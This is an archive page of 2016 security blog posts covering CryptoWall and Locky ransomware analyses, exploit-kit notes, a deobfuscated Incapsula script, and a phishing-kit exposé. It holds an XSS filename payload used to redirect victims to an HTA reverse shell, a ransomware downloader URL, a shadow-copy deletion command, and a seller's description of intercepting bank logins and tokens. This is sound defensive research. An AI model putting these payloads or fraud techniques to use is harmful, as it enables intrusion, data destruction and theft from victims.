Monthly Archives: May 2016


I'll be moving to a new position over the next few months, from intrusion analyst to penetration tester. As I make the transition to Red Team, I'll be posting articles and some of what I'm learning (but NetSec is ALWAYS learning something new) as well as Blue Team/intrusion analyst content.

The Day the Earth Stood Still for CryptoWall

It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the next level. Early ransomware used file sharing sites to upload infected files disguised as a normal file that could be downloaded by anyone. Once downloaded, it would run through the user’s machines and start encrypting the user’s data or locking their machines. So how did the CryptoWall evade our traditional defender – antivirus? We’ll break down just how CryptoWall did it:

ACT I: Setting the Stage

Communication is the most common tool in any business today. CryptoWall authors have been scraping the Internet for any published company email addresses (usually available via marketing sites) to use as the entry point of the attack. These sourced email addresses are then blasted with phishing emails. These phishing emails are crafted in a way that makes the receiver think it’s an important email and should be read and understood properly. They usually contain a link to a direct download or a file attachment of CryptoWall – unbeknownst to the user. The encryption starts when the user clicks.

Here is the sample of a ransomware-laced email disguised as a email: email example email example

ACT II: The Latest CryptoWall 4.0 Disassembled

CryptoWall  4.0

Md5: e73806e3f41f61e7c7a364625cd58f65

On the initial infection, the sample resolves the addresses of all the API functions that it needs to call later. This is done by means of a list of hashes, one for the name of every API call. This way the malware does not have to use an import table or store API names directly as strings.

Next, the malware gathers the following system information:

  • ComputerName
  • UserName
  • SystemDrive serial number
  • Number of CPUs (using PROCESSOR_Level)
  • Revision Number of CPU (using PROCESSOR_REVISION)
  • OS Major version
  • OS Minor version
  • IsWow64
  • Keyboard Layout

Among the loaded modules are DLLs related to Windows Crypto API (CRYPTSP), Windows 7 Enhanced Cryptographic Provider (RSAENH). This suggests that the malware is going to perform some cryptographic operations.

Figure 2


It will create the md5 hash of the victims PC using the above system information by using the following API sequence:

  • CryptAcquireContext
  • CryptCreateHash ; Algorithm ID = CALG_MD5 0x00008003, hash key: nonkeyed algorithm (0)
  • CryptHashData
  • CryptGetHashParam


Example 1

Example 2

Example 3

The malware will inject code in a newly spawned child process – Explorer.exe – using the following APIs:

  • ZwCreateSection
  • ZwMapViewOfSection
  • ZwAllocateVirtualMemory
  • ZwWriteVirtualMemory
  • ZwProtectVirtualMemory
  • ZwQueueApcThread
  • ZwResumeThread

It will create a copy of the original file in the %APPDATA% folder and create AutoStart Registry entry.

The injected code will be responsible for disabling system protection, as well as deleting all the system shadow copy and injecting code in a newly spawned process, svchost.exe.

Deleting shadow copies

Deleting shadow copies, allowing the malware to disable file recovery services.

 AV Limitations:

– Emulation TimeOut

Disable system restore

Disable system restore

Execution continues in the svchost.exe process.  This process formulates the commands needed to communicate with the C&C server. It will also gather the above system information and generate an md5 hash of the victims PC that will be used in communicating with the C&C server.

Some of the C&C servers:

C&C servers

C&C servers

The network communication is using HTTP, but with an encrypted payload. It will try to establish a connection in one of the following I2P proxy through I2P URLs. Once it succeeds, it will send a POST request with the encoded string request.

Figure 3

CryptoWall stores the following information inside a configuration file:

  • Received public key binary data
  • TXT
  • HTML
  • PNG

The last three files will be written in each folder of the victim’s system after the file-encryption process.

  • Normal file behavior
  • Payload after multiple layers of encryption

ACT III: “It’s like I left my keys inside my car”

If you’ve ever locked your keys inside your car, you know how irritating it feels. You know where they are, but you can’t do anything about it and you have to pay a locksmith to open it for you – or get real crafty with a wire coat hanger. Ransomware is a lot like that: Your most precious information and data has been held for ransom, and there is a chance that it could be released to the public – and you have no way to stop it.



Once CryptoWall has finished encrypting your files, it will launch the ransom notes that explain what happened and how to purchase the decrypter.

For an even deeper dive into CryptoWall, check out our analysis of CryptoWall 4 here.

ACT IV: Finding Solutions to Guard Against Ransomware

The bright spot in all this is that, if you can see the trend of the infection, there are lots of points where we can actually stop CryptoWall.

The first stop is via email. Advanced email defense solutions designed to catch malware that evades traditional defenses is a great tool to help stop attacks by detecting phishing links and exploits that deliver ransomware. That can stop CryptoWall from encrypting and taking the data from you.

The next defense is bolstering your network. Adding an advanced defense solution that identifies and correlates discovered threats with anomalous network activity is an invaluable tool to guard your data. ThreatTrack’s ThreatSecure Network, for instance, provides end-to-end network visibility and real-time detection to catch traffic hitting known malicious IPs associated with ransomware distribution and C&C.

The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

Heavy Obfuscation != Malicious

Malicious actors use obfuscation to evade detection, but programmers use it also for various reasons, like restricting reuse or bypassing ad blockers. Obfuscation should increase your attention to an alert, but it's not always indicative of hostile activity.

Here's an example.

IDS triggered on a rule for a common exploit kit, specifically on an eval statement. The code was:
(function(){var z="";var b="2866756e6374696f6e28297b66756e6374696f6e20682865297b7472797b636f6f6b696541727261793d5b5d3b666f722876617220623d2f5e5c733f696e6361705f7365735f2f2c643d646f63756d656e742e636f6f6b69652e73706c697428225c78336222292c633d303b633c642e6c656e6774683b632b2b296b65793d645b635d2e73756273747228302c645b635d2e696e6465784f6628225c7833642229292c76616c75653d645b635d2e73756273747228645b635d2e696e6465784f6628225c78336422292b312c645b635d2e6c656e677468292c622e74657374286b657929262628636f6f6b696541727261795b636f6f6b696541727261792e6c656e6774685d3d76616c7565293b636f6f6b6965733d636f6f6b696541727261793b646967657374733d417272617928636f6f6b6965732e6c656e677468293b666f7228623d303b623c636f6f6b6965732e6c656e6774683b622b2b297b666f722876617220673d652b636f6f6b6965735b625d2c633d643d303b633c672e6c656e6774683b632b2b29642b3d672e63686172436f646541742863293b646967657374735b625d3d647d7265733d652b225c7832635c7836345c7836395c7836375c7836355

;for(var i=0;ieval(eval('String.fromCharCode('+z+')'));})();

Changing the eval to print, and running it through Rhino, we get this:

[jstebelton@bwyissrv05 ~]$ rhino 10
(function(){function h(e){try{cookieArray=[];for(var b=/^\s?incap_ses_/,d=document.cookie.split("\x3b"),c=0;cres;g=new Date;g.setTime(g.getTime()+2E4);document.cookie="\x5f\x5f\x5f\x75\x74\x6d\x76\x63\x3d"+e+("\x3b\x20\x65\x78\x70\x69\x72\x65\x73\x3d"+g.toGMTString())+"\x3b\x20\x70\x61\x74\x68\x3d\x2f"}function l(e){for(var b=[],d=0;d"\x3d"+k)}break;case "\x76\x61\x6c\x75\x65":try{b[b.length]=encodeURIComponent(c+"\x3d"+eval(c).toString())}catch(h){b[b.length]=encodeURIComponent(c+"\x3d"+h)}break;case "\x70\x6c\x75\x67\x69\x6e\x73":try{p=navigator.plugins;pres="";for(a in p)pres+=(p[a].description+"\x20").substring(0,20);b[b.length]=encodeURIComponent("\x70\x6c\x75\x67\x69\x6e\x73\x3d"+pres)}catch(l){b[b.length]=encodeURIComponent("\x70\x6c\x75\x67\x69\x6e\x73\x3d"+l)}break;case "\x70\x6c\x75\x67\x69\x6e":try{for(i in a=navigator.plugins,a)if(f=a[i].filename.split("\x2e"),2==f.length){b[b.length]=encodeURIComponent("\x70\x6c\x75\x67\x69\x6e\x3d"+f[1]);break}}catch(m){b[b.length]=
encodeURIComponent("\x70\x6c\x75\x67\x69\x6e\x3d"+m)}}}return b=b.join()}var m=[["\x6e\x61\x76\x69\x67\x61\x74\x6f\x72","\x65\x78\x69\x73\x74\x73\x5f\x62\x6f\x6f\x6c\x65\x61\x6e"],["\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x76\x65\x6e\x64\x6f\x72","\x76\x61\x6c\x75\x65"],["\x6f\x70\x65\x72\x61","\x65\x78\x69\x73\x74\x73\x5f\x62\x6f\x6f\x6c\x65\x61\x6e"],["\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74","\x65\x78\x69\x73\x74\x73\x5f\x62\x6f\x6f\x6c\x65\x61\x6e"],["\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x61\x70\x70\x4e\x61\x6d\x65","\x76\x61\x6c\x75\x65"],["\x70\x6c\x61\x74\x66\x6f\x72\x6d","\x70\x6c\x75\x67\x69\x6e"],["\x77\x65\x62\x6b\x69\x74\x55\x52\x4c","\x65\x78\x69\x73\x74\x73\x5f\x62\x6f\x6f\x6c\x65\x61\x6e"],["\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x70\x6c\x75\x67\x69\x6e\x73\x2e\x6c\x65\x6e\x67\x74\x68\x3d\x3d\x30","\x76\x61\x6c\x75\x65"],["\x5f\x70\x68\x61\x6e\x74\x6f\x6d","\x65\x78\x69\x73\x74\x73\x5f\x62\x6f\x6f\x6c\x65\x61\x6e"]];try{h(l(m)),document.createElement("\x69\x6d\x67").src="\x2f\x5f\x49\x6e\x63\x61\x70\x73\x75\x6c\x61\x5f\x52\x65\x73\x6f\x75\x72\x63\x65\x3f\x53\x57\x4b\x4d\x54\x46\x53\x52\x3d\x31\x26\x65\x3d"+Math.random()}catch(n){img=document.createElement("\x69\x6d\x67"),img.src="\x2f\x5f\x49\x6e\x63\x61\x70\x73\x75\x6c\x61\x5f\x52\x65\x73\x6f\x75\x72\x63\x65\x3f\x53\x57\x4b\x4d\x54\x46\x53\x52\x3d\x31\x26\x65\x3d"+

We have hex encoding as the output of the function, so we can use a hex decoder to get the final output:

encodeURIComponent("plugin="+m)}}}return b=b.join()}var m=[["navigator","exists_boolean"],["navigator.vendor","value"],["opera","exists_boolean"],["ActiveXObject","exists_boolean"],["navigator.appName","value"],["platform","plugin"],["webkitURL","exists_boolean"],["navigator.plugins.length==0","value"],["_phantom","exists_boolean"]];try{h(l(m)),document.createElement("img").src="/_Incapsula_Resource?SWKMTFSR=1&e="+Math.random()}catch(n){img=document.createElement("img"),img.src="/_Incapsula_Resource?SWKMTFSR=1&e="+

Incapsula is a DDoS protection security vendor.

Leaping Forward – Telling the Story of How InfoSec Has Matured into Cyber Risks

Readers of this blog know that I've spent nearly the past decade curating some of the best quotes about information security and related topics. What started as a self-serving repository of good material for my own use eventually grew into this blog. I owe a big thank you to all of those who, over the course of the years, have shared this site with others around them.

However, in the past year, I have to admit that I've been much more active on a different blog, that of the IBM sponsored SecurityIntelligence blog. Which brings me to this post.

Just this week, the IBM site published my 30th article, "Five Signs the CISO Who Got You Here Isn’t the Best One to Get You There," whose topic relates nicely to the evolution of the field of information security -- let's admit, security was never really just an IT issue -- and the evolution of the role of CISO.

Just as businesses have had to evolve in order to thrive, or even just to survive, so must we evolve, as information security professionals, in the face of a changing reality. We now have the attention that we've been asking C-Suite executives and board directors for. We must now step up to fulfill this new role, to meet these new expectations. The stakes are high -- businesses everywhere are getting hammered by attackers, some after a quick buck, others after the company's crown jewels.

In pitching and developing these 30 articles, I've always sought to bring value to the reader, primarily aimed at CISOs or aspiring CISOs. I'm including below the full set of links to these 30 articles (in ascending chronological order). And since IBM's blog doesn't allow for comments, I'm inviting readers everywhere to leave comments on this post instead.

Again, thank you for your support, and for your readership.

As an Information Security Professional, Are You Having the Right Conversations?
Improving Your Security Awareness Campaigns: Examples From Behavioral Science
Cyber Risks: From the Trenches to the Boardroom
CISO Influence: The Role of the Power Distance Index and the Uncertainty Avoidance Dimensions
How Helping Educators Is Good for the Cybersecurity Industry
Addressing the Information Security Skills Gap in Partnership With Academia
Why Is Your Board of Directors Finally Asking About Cyber Risks?
What Cybersecurity Questions Are Boards Asking CISOs?
Five Must-Read Articles on the Cybersecurity Skills Gap
What Can CISOs Take From the New NYSE Cybersecurity Guide?
How Are US Armed Forces Closing the Cyber Skills Gap?
How Should CISOs Report Cyber Risks to Boards?
Beyond Tech Skills: Leadership Qualities for CISOs
Get the Most Out of Your Recent Security Hires With Soft Skills
Get the Most Out of Your Recent Security Hires: The Value of Professional Development
New Year’s Resolutions for the Effective CISO
Cyber Risks: Three Areas of Concern for 2016
Highlights From the World Economic Forum’s Global Risks Report 2016
2015: The Year Feds Warned About Cyber Risks
Is Your CISO Ready to Be a Risk Leader?
Is Your CISO Out Of Place?
FTC Studying Practices of Nine PCI Companies
C-Suite Dynamics Can Impact The Organization's Cybersecurity
It's Not Too Late to Correct Your Security Posture
Securing the C-Suite, Part 1: Lessons for Your CIO and CISO
Securing the C-Suite, Part 2: The Role of CFOs, CMOs and CHROs
Securing the C-Suite, Part 3: All Eyes on the CEO
Engaging Conversations Key to Improving Cyber Risk Decisions
How to Make the Most of Your Pen Test
Five Signs the CISO Who Got You Here Isn't The Best One To Get You There

CVE-2016-4117 (Flash up to and Exploit Kits

Discovered being exploited in the wild by FireEye [1] on May 8, 2016, patched 4 days later with Flash, CVE-2016-4117 is making its way to Exploit Kits.

Magnitude :
CVE confirmed by FireEye - Thanks !
On 2016-05-21 Magnitude is firing an exploit to Flash up to

Magnitude firing exploit to Flash - 2016-05-21
For now i did not get exploitation in the different pass i tried but in the Flash exploit we can see some quite explicit imports :

 import com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation;

Magnitude Flash Exploit showing import of the DeleteRangeTimelineOperation

Spotted sample :  f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0a
Fiddler sent here.
Updates to come as it appears to be a work in progress.

Neutrino :
Spotted by Eset.

2016-05-23 Neutrino successfully exploit CVE-2016-4117 on Flash and drop here CryptXXX
Sample in that pass : 30984accbf40f0920675f6ba0b6daf2a3b6d32c751fd6d673bddead2413170e8
Fiddler sent here (Password is malware)
Out of topic payload: 110891e2b7b992e238d4afbaa31e165a6e9c25de2aed442574d3993734fb5220 CryptXXX

Angler EK:
CVE identification by Henri Nurmi from F-Secure. Thanks !
Angler EK successfully exploit Flash on 2016-05-23 dropping Dridex

Sample in that pass : 310528e97a26f3fee05baea69230f8b619481ac53c2325da90345ae7713dcee2
Fiddler sent here
Out of topic payload  : 99a6f5674b738591588416390f22dedd8dac9cf5aa14d0959208b0087b718902
Most likely Dridex 123 targeting Germany based on distribution path.

Sundown :  [3]

Sample in that pass : cf6be39135d8663be5241229e0f6651f9195a7434202067616ae00712a4e34e6 

Fiddler sent here  (password : malware)

Read More:
[1] CVE-2016-4117: Flash Zero-Day Exploited in the Wild - 2016-05-13 - Genwei Jiang - FireEye
[2] New Flash Vulnerability CVE-2016-4117 Shares Similarities With Older Pawn Storm Exploit - 2016-05-13 - Moony Li - TrendMicro
[3] Sundown EK – Stealing Its Way to the Top - 2016-09-02 - Spiderlabs

How a spamfilter can help you to drop a shell

A while ago i discovered a cross-site scripting vulnerability (XSS) in the McAfee E-mail Gateway (MEG) 7.6.4. I reported this vulnerability to McAfee, they fixed it within a few months. The security advisory can be found over here. MEG is an application that can be used to filter out malicious attachments from e-mails, however due to the vulnerability an attacker is able to abuse this functionality to drop a malicious file.

The McAfee E-mail Gateway is replacing a malicious file with a warning HTML-file (1_warning.html). I saw that this HTML-file is displaying the filename of the replaced malicious file (e.g. malicious.xlsx). This made me curious, I decided to check whether it was possible to use this filename to perform a cross-site scripting attack because it was used within HTML-context.

In order to check whether the XSS was present, i created a malicious Excel document. The file needs to be malicious in order to be replaced by the McAfee E-mail Gateway. The file was named “file<IMG SRC=x onerror=”alert(‘XSS’)”>jem.xls“. I e-mailed this file to a e-mailbox that was protected by McAfee E-mail Gateway. When opening the warning HTML-file, the following behavior became clear:


Together with @rikvduijn i decided to abuse this issue further in order to pop a shell on a target , with some user interaction. The XSS attack can be used to redirect a victim to a malicious website. We decided to use HTA-files, these files can be generated using the awesome Unicorn script. By performing a document.location on the victims computer, pointed to the HTA-file, our victim should get a popup with the question to open the HTA-file.

After trying, we achieved the redirect with the following filename (replace 99,99,99… with charcodes for URL):
file<IMG SRC=x onerror=document.location(String.fromCharCode(99,99,99,99,99,99,99,99,99,99,99,99,99,99))>jem.xls
The filename was changed and the document was send again to the victim, and the popup appeared!


When the victim opens the file, his computer runs a reverse https meterpreter backdoor. Thank you e-mail filter :-).


Understanding the Latest Version of Locky Ransomware

It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since.

Locky e-mails usually come in with an attached zip archive and once extracted may contain a document or JavaScript. The Locky ransomware we discovered included a JavaScript that will potentially download and run an executable. The executable is the focal point of this analysis and the latest version of the Locky ransomware.

Locky spam email

The spam email sent by the malware authors.

Basic Infection Flow and File Hashes:

  • 1582A0B6A04854C39F8392B061C52A7A – The .zip attachment
  • 59D2E5827F0EFFE7569B2DAE633AFD1F – The JavaScript extracted from the .zip
  • F79C950FA3EFC3BB29A4F15AE05448F2The Locky executable downloaded by the Javascript
Basic infection and file hashes

Basic infection and file hashes

Indications of Compromise:

It is fairly easy to find out if a machine is infected by Locky. The image below shows the desktop background of a compromised Windows XP machine.

Desktop of a Locky-infected computer

Desktop of a Locky-infected computer


The files that have been encrypted by the ransomware are named with the extension “.locky” and their names start with the personal ID for the infected user – in this case “8B74B4AA40D51F4A,” an MD5 hash. There is also a text file named “_HELP_instructions.txt” that contains the same message displayed in the desktop background.

Locky files

Locky files

Locky creates an encrypted user-specific registry key at HKCU\Software. The details about the registry values will be discussed later on in this post. The key created was “8W21gQe9WZ3tc.


Encrypted user-specific key

Encrypted user-specific key


Payment Instructions

The user is instructed to install TOR browser to access the payment webpage – shown below. The victim must have a bitcoin wallet to send 1.5 bitcoin to the specified bitcoin address.

Payment page for Locky ransomware

Payment page for Locky ransomware 

A Look at the JavaScript 59D2E5827F0EFFE7569B2DAE633AFD1F

The JavaScript is straightforward. The following lines are visible once opened in a text editor:

JavaScript 1

JavaScript 1

The Javascript downloads via GET command from http://goldish[dot]dk/o2pds and executes it in %Temp%. The executable will not run properly if not located in a %Temp% folder.

In-Depth Analysis of the Executable F79C950FA3EFC3BB29A4F15AE05448F2

Just like other malware families such as Upatre, Dridex and Crypto, the real Locky executable is wrapped by some encryption routines to avoid signature-based detections. The last step of the unwrapping process is to decompress the executable by using RTLDecompressBuffer API. We’ve seen this same method before from Upatre and Necurs rootkit downloaders.

RTLDecompressBuffer API

RTLDecompressBuffer API


The MD5 of the unwrapped Locky executable analyzed is F35D01F835FC637E0D9E66CD7E571C06.

The first step of the executable is to decrypt the following CnC Server IP addresses.

CnC Server IP addresses

CnC Server IP addresses


The executable retrieves the Windows directory by the API GetWindowsDirectoryA. Then it will be used as a parameter for the API GetVolumeNameForVolumeMountPointA. This Function retrieves the volume GUID path associated with the machine’s Windows folder.

Windows directory

Windows directory 

This GUID will serve as the initial basis of the Locky ransomware for the unique ID of the user.

First, GUID be used by the executable for the API CryptHashData.

API CryptHashData

API CryptHashData

For The executable to obtain the unique ID – “8B74B4AA40D51F4A” – for the machine, it will use the API CryptGetHashParam to get the unique ID associated with the GUID. It is visible at the first 8 Bytes at the hex dump.

API CryptGetHashParam

API CryptGetHashParam


This unique ID is correlated with the new registry key of this version of Locky. The ID will be converted by a checksum to string routine implemented by the executable to obtain a string that will be used as its registry key.

For this new version, these particular set of instructions explain why the new registry key is “8W21gQe9WZ3tc” instead of “Locky,” used before in the older versions.

New registry key

New registry key 

CnC Communication

The Locky executable sends a “POST” request to “http://<IP/Domain>/submit.php” by the following commands and parameters:

Commands Parameters (Remove the <>)
&act=getkey&affid= id=<>,&lang=<>,&corp=<>,&serv=<>,&os=<>,&sp=<>,&x64=<>
&act=gettext&lang= id=<>
&act=stats&path= id=<>,&encrypted=<>,&failed=<>,&length=<>

An example of parameters for Command &act=getkey&affid=: (Not Encrypted Form)


These commands will be sent to the CnC server in encrypted form via the API HttpSendRequestA. The executable also receives an encrypted reply via the API InternetReadFile.

CnC server commands

CnC server commands


After sending the getkey command to the CnC, the executable will decrypt the encrypted message and getkey command it received the public RSA key. The image below shows a part of the decryption routine. The public RSA key is at the ASCII dump.

Decryption routine

Decryption routine 

Saving The Public Key in the User’s Machine

The executable will encrypt the public RSA key and its checksum will be converted to a string equivalent – just like how the registry key was created. It will be stored as a binary value in its registry key at HKCU\Software. The value name is “270CwQa9XuPIc7.”

Encrypting public RSA key

Encrypting public RSA key

A Message to the User

Then it will send the CnC command “&act=gettext&lang=.” This will retrieve the Locky ransomware message equivalent to the desktop background image.

Locky ransomware message

Locky ransomware message


Once again, just like the public RSA key, this message will be encrypted, stored to a binary value in the HKCU\software registry key created by the executable. The message is equivalent to the registry value “7CaY397p5R.”

Gathering the Drives, Network Resources and Files to Encrypt

Network Shares and Resources:

The executable used a routine consisting of APIs WNetOpenEnumW, WNetEnumResourcesW, WNetAddConnection2 and WNetCloseEnum to parse through these three types of resources:


The usage of NetResource Parsing Routine for different types of resources:

NetResource Parsing Routine

NetResource Parsing Routine

Upon enabling a shared folder for the machine under analysis, the image shows that the executable will connect to the shared folder so it can encrypt the files in the shared folder later on.

Encrypting files in the shared folder

Encrypting files in the shared folder

The executable then uses the APIs GetLogicalDrives and GetDriveTypeW to gather the possible drives to encrypt. In this case, it obtained the “C:\” drive.

Encrypting the C:/ drive

Encrypting the C:/ drive 

The last step is to spawn the thread that will encrypt the files per folder in the drives and resources that were gathered.

Final step in the Locky ransomware process

Final step in the Locky ransomware process


Deleting the Shadow Copies to Prevent Data Restoration

The next step for the executable is to delete the shadow copies by running this command:

“vssadmin.exe Delete Shadows /All /Quiet”

Other Ransomwares, including Crypto, has used this same command.

The File Encryption Process – the Thread Spawned

The first step in this phase is to parse the directories and files of the machine. The executable allocates a memory space as a structured reference for the files to be encrypted.

White List Check

While parsing the directories of the machine, it will check the file name of each file against the following set of white list strings. File names that have one of the “ff.” strings will not be encrypted.

  • @_HELP_instructions.bmp, _HELP_instructions.txt, _Locky_recover_instructions.bmp, _Locky_recover_instructions.txt, tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, Windows

Black List Check

The Locky executable also checks the extension of the file to be encrypted. If the file has one of the “ff.” extensions, it will be encrypted.

  • .001, .002, .003, .004, .005, .006, .007, .008, .009, .010, .011, .123, .3dm, .3ds, .3g2, .3gp, .602, .7z, .ARC, .CSV, .DOC, .DOT, .MYD, .MYI, .NEF, .PAQ, .PPT, .RTF, .SQLITE3, .SQLITEDB, .XLS, .aes, .asc, .asf, .asm, .asp, .avi, .bak, .bat, .bmp, .brd, .cgm, .class, .cmd, .cpp, .crt, .cs, .csr, .db, .dbf, .dch, .dif, .dip, .djv, .djvu, .docb, .docm, .docx, .dotm, .dotx, .fla, .flv, .frm, .gif, .gpg, .gz, .hwp, .ibd, .jar, .java, .jpeg, .jpg, .js, .key, .lay, .lay6, .ldf, .m3u, .m4u, .max, .mdb, .mdf, .mid, .mkv, .mml, .mov, .mp3, .mp4, .mpeg, .mpg, .ms11, .ms11 (Security copy), .n64, .odb, .odg, .odp, .ods, .odt, .onetoc2, .otg, .otp, .ots, .ott, .p12, .pas, .pdf, .pem, .php, .pl, .png, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .pptm, .pptx, .psd, .pst, .qcow2, .rar, .raw, .rb, .sch, .sh, .sldm, .sldx, .slk, .sql, .stc, .std, .sti, .stw, .svg, .swf, .sxc, .sxd, .sxi, .sxm, .sxw, .tar, .tar.bz2, .tbk, .tgz, .tif, .tiff, .txt, .uop, .uot, .vb, .vbs, .vdi, .vmdk, .vmx, .vob, .wav, .wb2, .wk1, .wks, .wma, .wmv, .xlc, .xlm, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .zip, wallet.dat (filename specific)

API and Function-Level Overview of the File Encryption Process:

The Locky ransomware’s claim that it uses AES and RSA is basically true. It used Crypto APIs during the encryption process, including CryptGenRandom and CryptEncrypt. It also had two functions in this process that used the instructions “aesenc” and “aeskeygenassisst.

API overview

API overview

Dissecting the Last 0x344 Bytes of an Encrypted Locky File

In the image below, the last 0x344 bytes are being written at the end of file. The first four bytes are hard coded by the executable. We believe this is some sort of an identifier for the Locky ransomware authors for the version that encrypted the user’s files.

Hard-coded 0x8956FE93

Hard-coded 0x8956FE93


Writing to the file

Writing to the file 

The Next 0x10 bytes are obviously the unique ID of the user. The next 0x100 bytes are the output of the CryptEncrypt API. The last 0x230 bytes are from the AESENC function mentioned from the encryption flow before.

Finalizing the Infection

The executable will generate the “_HELP_instructions.txt” file for every folder path where it encrypted a file. It will also generate an equivalent Bitmap image for the instructions and store it so it becomes the user’s desktop background.

The executable will then send another actioncalled “stats” – to the CnC server:                  id=8B74B4AA40D51F4A&act=stats&path=c%3A&encrypted=1&failed=0&length=5912

Path = the infected Drive “C:\”

Encrypted = True

Failed = false

Length = number of files

The last step is to create the last encrypted registry value. It is equivalent to the previous version “Completed = Yes.” This completes the details about the three encrypted registry values.

Last step of the encryption process

Last step of the encryption process


The analyzed executable also had the domain generation algorithm, which has been known to exist for the Locky ransomware since its existence last year. It will be used by the executable if it cannot receive a response from the initially decrypted IP addresses.

How to Mitigate

Using ThreatSecure products, it is possible to block the ransomware executable from downloading. The image below shows ThreatSecure Network detecting the malicious download via the GET procedure.


ThreatSecure in action

ThreatSecure in action 

Prior to opening an e-mail attachment, the customer can use ThreatTrack’s dynamic malware analysis sandbox product – ThreatAnalyzer – to determine if the file is malicious. ThreatAnalyzer logs its output in a file named “analysis.xml.” By looking at this output, you can tell it has seen the executable’s ransomware behaviors (IoCs).

Stored and Encrypted Files to .locky:

The sandbox detects that the files were encrypted, and the “Help Instructions” text file was also generated.

Help instructions text file

Help instructions text file 

Network capture of Communication to CnC via post command to the CnC Server IP:

An outgoing connection is being initiated by Locky.

Network capture of communication to CnC

Network capture of communication to CnC


Process capture of Vssadmin.exe execution, deleting all backups:

Process capture of Vssadmin.exe execution

Process capture of Vssadmin.exe execution

Setting an encrypted registry value “4Y0743Ngl” at HKCU\software:

Prior to file encryption, Locky enumerates the network resources of the machine, which can also be encrypted. ThreatAnalyzer was also able to see this behavior:

Locky enumerating network resources

Locky enumerating network resources


As shown here, advanced threat defense products like those used here help avoid ransomware infection. The advanced solutions catch the emerging threat before it can do any damage.

What’s more, the sandbox capabilities of ThreatAnalyzer also showed that it can log indications of compromise and potential malicious activities once a user accidentally opens the attachment – one more way users are guarded against increasingly popular ransomware attacks.

The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

2880823 – Deprecation of SHA-1 Hashing Algorithm for Microsoft Root Certificate Program – Version: 2.0

Revision Note: V2.0 (May 18, 2016): Advisory updated to provide links to the current information regarding the use of the SHA1 hashing algorithm for the purposes of SSL and code signing. For more information, see Windows Enforcement of Authenticode Code Signing and Timestamping.
Summary: Microsoft is announcing a policy change to the Microsoft Root Certificate Program. The new policy will no longer allow root certificate authorities to issue X.509 certificates using the SHA-1 hashing algorithm for the purposes of SSL and code signing after January 1, 2016. Using the SHA-1 hashing algorithm in digital certificates could allow an attacker to spoof content, perform phishing attacks, or perform man-in-the-middle attacks.

U-Admin (Universal Admin): A Phishing(Web&Android)/Grabber/ATS/Token kit

Fallout Vault Boy mask

The goal of the post is to open-source data on a kit that has been seen live impersonating bank portal. This is mostly Raw data, few part only will be "google translated".

On September 2015 the 16th,  an advert about a multipurpose kit appeared underground :
By: [Redacted]
Subject : Инжекты | Админки | Фейки, -50% от рыночных цен -

Доброе время суток всем.

Рад предоставить свои услуги по разработке следующих проектов:

Grabers 80-150$*;
Pasive ATS 500-800$*;
Active ATS 800-1500$*;
Tooken Panels 400-800$*;
Replacers 200-400$*;
И многое другое...

Простые клоны 70-150$*;
Продвинутые с перехватом 200-500$*;

Админки на пхп;
Под любые нужды ...

*данные цены служат ориентиром. Реальная цена будет зависеть от каждого техзадания индивидуально

Jabber( [Redacted] )
ICQ( 6[Redacted]8 )
Google Translated as :
By: [Redacted]
Subject: Inject | admin area | Fakes, -50% of the market price -

Good time of day to all.

I am glad to provide services for the development of the following projects:

Grabers 80-150 $ *;
Pasive ATS 500-800 $ *;
Active ATS 800-1500 $ *;
Tooken Panels 400-800 $ *;
Replacers 200-400 $ *;
And much more...

Simple clones 70-150 $ *;
Advanced interception $ 200-500 *;

Admin Center on php;
Under any needs ...

* These prices are a guide. The actual price will depend on each individual ToRs

Jabber ([Redacted] @
ICQ (6[Redacted]8)

NB : The Subject became later :
Инжекты | Админки | Фейки | Android Инжекты, -50% от рыночных цен -
Inject | admin area | fakes | Inject Android, 50% of the market price -
Seller later added :

Последее время очень мнoго вопросов по поводу как работает перехват на скам странице. Решил детально описать процес чтобы изначально не вводить клиентов в заблуждение.

В самом начале надо понять что такое "СКАМ СТАНИЦА".
"СКАМ СТРАНИЦА"- это копия реальной странички логина в банк ,которая находится на нашем сервере с похожем на банк доменом. Все детали вводимые на ней будут лететь к нам.
Далее уже на выбор, или дание идут на емайл, или на специально сделанную админку.
Тоесть суть замута такова:
жертва попадает на нашу страницу ->
вводит данные->
потом наша страница кидает жертву обратно на оригинал ->
и мы поже ипользуем данные сами чтобы войти..

| Это самый примитивный пример , на самом деле все чуток сложнее и зависит от фантазии заказа .

Дальше надо понять что такое "ПЕРЕХВАТ".
"ПЕРЕХВАТ" - eто вид обмана, очень часто ипользуетса в инжектах. Само название говорит за себя.
Инжект перехватывает дание в рельном времени и присылает нам . В это время жертва как обычно ждет с гиф на экране,а вы заходите вместо него.

| Зачем это надо?
Затем что если для перевода вам требуется дополнительно второй пароль/смс/тукен то можно это запросить ,пока жертва ждёт, через специально сделанные команды в админке.
Основной бенефит что это можно делать повторно ,много раз.

| Перехват на скам страничке работать точно также . Жертвa вводить дание и ждет пока мы его спросим то что нам надо.

Преставим себе что есть банк где на вход надо UserName и Password . На активацию перевода по IBAN надо нoмер с тукен-прибора (Pin1) и для переводa надо ввести номер в тукен-прибор и тукен-прибор даст нам номер обратно (Pin2)
Теперь преставим себе что у нас есть скам странница на этот банк , которая будет отсылать нам получение даные для входа и потом покажет заставку жертве с просьбой подождать. 

Мы находимся на другом конце в админке и наблюдаем такую катину .

Краткое пособие по админке.

"I'am Online"- показывает находится ли оператор в админке , если "Off-line" то все жертвы будут перенаправлены обратно на оригинал страницу.
